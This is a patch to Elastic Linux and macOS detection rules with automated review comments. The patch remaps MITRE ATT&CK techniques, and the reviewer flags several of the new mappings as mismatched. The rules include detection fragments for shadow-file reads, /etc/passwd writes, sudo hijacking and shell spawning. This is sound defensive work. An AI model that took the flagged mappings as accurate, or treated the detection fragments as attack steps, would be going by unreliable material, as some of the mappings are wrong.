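Review bot: The `@@ -100,23 +100,31 @@` hunk swaps the sub-technique from T1574.006 Dynamic Linker Hijacking to `T1574.007` Path Interception by PATH Environment Variable, but the query in the header context matches `file.path : "/*GCONV_PATH*"`; GCONV_PATH is glibc's lookup path for iconv/gconv modules (shared objects), not the executable search `PATH` that T1574.007 is defined around, so the new sub-technique mis-describes the mechanism. Either keep T1574.006 or fall back to the parent `T1574` without a sub-technique. Layout also drifts here (no blank line before the second `[[rule.threat]]`, doubled blanks before `[rule.threat.tactic]`); re-serialize before merging.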
@@ -83,29 +83,29 @@ Buffer overflow attacks exploit vulnerabilities in software to execute arbitrary [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.threshold] field = ["event.kind", "host.id"] value = 100 diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml index 7aa6f9831f5..f7d626e37d7 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
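Review bot: The moved Privilege Escalation entry is glued to the Initial Access entry: `+reference = "https://attack.mitre.org/tactics/TA0004/"` is directly followed by `+[[rule.threat]]`, while a blank added line is inserted before the Initial Access `[rule.threat.tactic]`, so table spacing is now uneven. The reorder itself is behaviour-neutral (same two entries, same techniques and tactics). The same glued `[[rule.threat]]` appears in the privilege_escalation_shadow_file_read.toml threat hunk.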
@@ -84,7 +84,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -133,6 +141,11 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -147,3 +160,11 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml index 69a21b3669b..6073256d5ec 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
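Review bot: The new `[[rule.threat]]` for Persistence (TA0003) has no `[[rule.threat.technique]]`, so the added `Tactic: Persistence` tag rests on a tactic-only entry that names no behaviour; either add the technique that makes this SUID/SGID rule a persistence detection or drop both the entry and the tag. The same technique-less tactic entries are added in privilege_escalation_potential_suid_sgid_proxy_execution.toml (Persistence) and collection_sensitive_file_access_followed_by_compression.toml (Exfiltration). T1068 (Exploitation for Privilege Escalation) is also added next to T1548.001, which describes setuid/setgid abuse rather than exploitation of a software vulnerability; if that pairing is intended it should be justified once, because the same T1068 block is added to the proxy_execution, wildcard_shell_spawn, shadow_file_read, cap_setuid_python and uid_guid_elevation rules in this patch.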
@@ -81,7 +81,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -116,6 +125,11 @@ not process.parent.executable in ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -130,3 +144,24 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" diff --git a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml index 37598c101d8..c214967001f 100644 --- a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml 
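Review bot: In the new Defense Evasion entry the `[rule.threat.tactic]` table is written before `[[rule.threat.technique]]` and its `name` key precedes `id`, unlike every other entry in this file, which uses technique-then-tactic with `id`, `name`, `reference` order. Keep the existing order so the block reads like its neighbours and survives the rule formatter unchanged. The Persistence entry above it carries no technique, the same issue raised on privilege_escalation_potential_suid_sgid_exploitation.toml.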
+++ b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -81,7 +81,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] type = "eql" query = ''' sequence by host.id with maxspan=1s @@ -103,16 +113,24 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [rule.threat.tactic] id = "TA0002" name = "Execution" 
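Review bot: The T1059.004 (Unix Shell) sub-technique is removed from the Execution entry with nothing replacing it, although the rule (per its file name and the `sequence by host.id` context) detects a shell being spawned; the parent T1059 alone is less precise than what was there. Keep the `[[rule.threat.technique.subtechnique]]` block for T1059.004 unless the narrowing was intentional. The new `Tactic: Privilege Escalation` tag and the T1068 entry are consistent with each other.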
diff --git a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml index 11888270c0a..d916e1256e9 100644 --- a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml +++ b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -49,7 +49,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -97,11 +104,16 @@ DebugFS is a Linux utility that provides a low-level interface to access and man framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1006" -name = "Direct Volume Access" -reference = "https://attack.mitre.org/techniques/T1006/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
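Review bot: T1006 (Direct Volume Access) under Defense Evasion is replaced by T1078.003 (Local Accounts) under Privilege Escalation, but the context line about DebugFS providing a low-level interface to disk describes raw volume access, which is exactly T1006, while T1078.003 describes use of local account credentials that this rule does not observe. If Privilege Escalation is the intended primary tactic, keep the T1006 / TA0005 entry alongside the new one rather than dropping it, and then restore `Tactic: Defense Evasion` in the tags list that this patch replaces with `Tactic: Privilege Escalation`. The `updated_date` regresses here as in the other files.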
diff --git a/rules/linux/privilege_escalation_shadow_file_read.toml b/rules/linux/privilege_escalation_shadow_file_read.toml index 720aed99079..e4e20b3b750 100644 --- a/rules/linux/privilege_escalation_shadow_file_read.toml +++ b/rules/linux/privilege_escalation_shadow_file_read.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -79,7 +79,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -103,6 +112,18 @@ host.os.type : "linux" and event.category : "process" and event.action : ("exec" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" 
@@ -117,6 +138,7 @@ reference = "https://attack.mitre.org/techniques/T1003/008/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml index 832ec099d33..c90a6990fbb 100644 --- a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml +++ b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -114,14 +114,9 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/privilege_escalation_sudo_hijacking.toml b/rules/linux/privilege_escalation_sudo_hijacking.toml index edb6791dcf1..b137cf4d019 100644 --- a/rules/linux/privilege_escalation_sudo_hijacking.toml +++ b/rules/linux/privilege_escalation_sudo_hijacking.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
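Review bot: T1548.003 (Sudo and Sudo Caching) is dropped and replaced by T1068 (Exploitation for Privilege Escalation) in privilege_escalation_sudo_cve_2019_14287.toml. T1068 fits a CVE-specific rule, but removing T1548.003 loses the sudo-specific mapping; other hunks in this patch keep T1548 next to the new T1068 within one entry (the suid_sgid rules), and the same can be done here by adding the T1068 block instead of substituting it. The enclosing `[[rule.threat]]` starts before the hunk.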
@@ -123,19 +123,6 @@ file.path in ("/usr/bin/sudo", "/bin/sudo") and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -150,3 +137,16 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml index 18f20937a5d..a679ec48580 100644 --- a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml +++ b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -103,6 +103,11 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" 
diff --git a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml index b1539ceef80..0035cfea05d 100644 --- a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -46,7 +46,15 @@ However, if more advanced configuration is required to detect specific behavior, -- "-w /root/ -p rwxa -k audit_root" """ severity = "medium" -tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
@@ -101,31 +109,14 @@ In Linux, CAP_CHOWN and CAP_FOWNER are capabilities that allow processes to chan [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique.subtechnique]] -id = "T1222.002" -name = "Linux and Mac File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/002/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml index 80df457f7e6..923962a5d96 100644 --- a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml +++ b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/22" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] 
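Review bot: The entire Defense Evasion entry (T1222.002, Linux and Mac File and Directory Permissions Modification) and the T1548 technique are removed and replaced by T1068 alone, yet the context line describes CAP_CHOWN and CAP_FOWNER letting a process change file ownership and permissions, which is what T1222.002 names; the new mapping is less precise than the old one. The tags hunk of this file drops `Tactic: Defense Evasion` to match, so restoring the entry means restoring the tag as well. privilege_escalation_suspicious_passwd_file_write.toml has the same substitution (T1136.001 Create Account and T1098 Account Manipulation replaced by T1068) for a rule about writes to /etc/passwd, plus the same tag removal. Layout, in both files: the blank line after `framework = "MITRE ATT&CK"` is removed and a stray empty added line trails the file.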
@@ -68,7 +68,15 @@ However, if more advanced configuration is required to detect specific behavior, -- "-w /etc/passwd -p wa -k etcpasswd" """ severity = "medium" -tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -116,31 +124,14 @@ In Linux environments, the `/etc/passwd` file is crucial for managing user accou [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml index 0ecf1365784..a179911f656 100644 --- a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -122,6 +122,11 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" diff --git a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml index 2634a5f0b87..46af7128890 100644 --- a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml +++ b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -81,7 +81,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -108,19 +116,33 @@ and process.parent.name:("bash" or "dash" or "sh" or "tcsh" or "csh" or "zsh" or framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [[rule.threat.technique.subtechnique]] -id = "T1548.001" -name = "Setuid and Setgid" -reference = "https://attack.mitre.org/techniques/T1548/001/" +id = "T1574.013" +name = "KernelCallbackTable" +reference = "https://attack.mitre.org/techniques/T1574/013/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml index 83b68d9963f..05c5c6f2abf 100644 --- a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml +++ b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
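Review bot: T1574.013 (KernelCallbackTable) replaces T1548.001 (Setuid and Setgid) in a Linux rule (rules/linux path, `process.parent.name:("bash" or "dash" ...)` context); KernelCallbackTable is a Windows user-mode structure and that sub-technique is scoped to Windows in ATT&CK, so this mapping is a platform mismatch. Use the parent T1574 without a sub-technique, or restore T1548.001, whichever matches the intended behaviour. T1014 (Rootkit) under the new Defense Evasion entry is also a strong claim for a new_terms rule keyed on `process.executable` and should be justified or dropped. The `Tactic: Defense Evasion` tag added in this file's tags hunk is consistent with the new entry.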
@@ -121,9 +121,9 @@ process.executable: "/usr/bin/unshare" and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml index d33678e809c..298a32c90fc 100644 --- a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml +++ b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
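Review bot: T1611 (Escape to Host) is replaced by T1543 (Create or Modify System Process) for a rule keyed on `process.executable: "/usr/bin/unshare"`. unshare creates or enters namespaces, which is the container-boundary behaviour T1611 describes, whereas T1543 is about system services and daemons; unless the rule text ties this to service creation, the original technique was the closer fit. The tactic stays TA0004, so no tag change is needed either way.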
@@ -75,40 +75,30 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1074" -name = "Data Staged" -reference = "https://attack.mitre.org/techniques/T1074/" + [rule.threat.tactic] + name = "Collection" + id = "TA0009" + reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat.technique.subtechnique]] -id = "T1074.001" -name = "Local Data Staging" -reference = "https://attack.mitre.org/techniques/T1074/001/" + [[rule.threat.technique]] + name = "Data Staged" + id = "T1074" + reference = "https://attack.mitre.org/techniques/T1074/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat.technique.subtechnique]] + name = "Local Data Staging" + id = "T1074.001" + reference = "https://attack.mitre.org/techniques/T1074/001/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.threat.tactic] + name = "Discovery" + id = "TA0007" + reference = "https://attack.mitre.org/tactics/TA0007/" + + [[rule.threat.technique]] + name = "System Information Discovery" + id = "T1082" + reference = "https://attack.mitre.org/techniques/T1082/" diff --git a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml index ed184cef7fe..68fa16c9024 100644 
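Review bot: The rewritten Discovery entry keeps only T1082 (System Information Discovery) and drops T1016 (System Network Configuration Discovery) and T1033 (System Owner/User Discovery) with no replacement, so a sequence rule about discovery output being written now maps to one of the three techniques it previously covered; confirm the narrowing is intended. Layout also changes: the new sub-tables are indented by two spaces, `name` is written before `id`, and `[rule.threat.tactic]` precedes the techniques, unlike the removed lines and every Linux rule in this patch; the same layout is used in the other macOS hunks (sensitive_file_access, aws_s3, wget, google_calendar). Pick one layout for the repository so the formatter does not rewrite these blocks on the next save.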
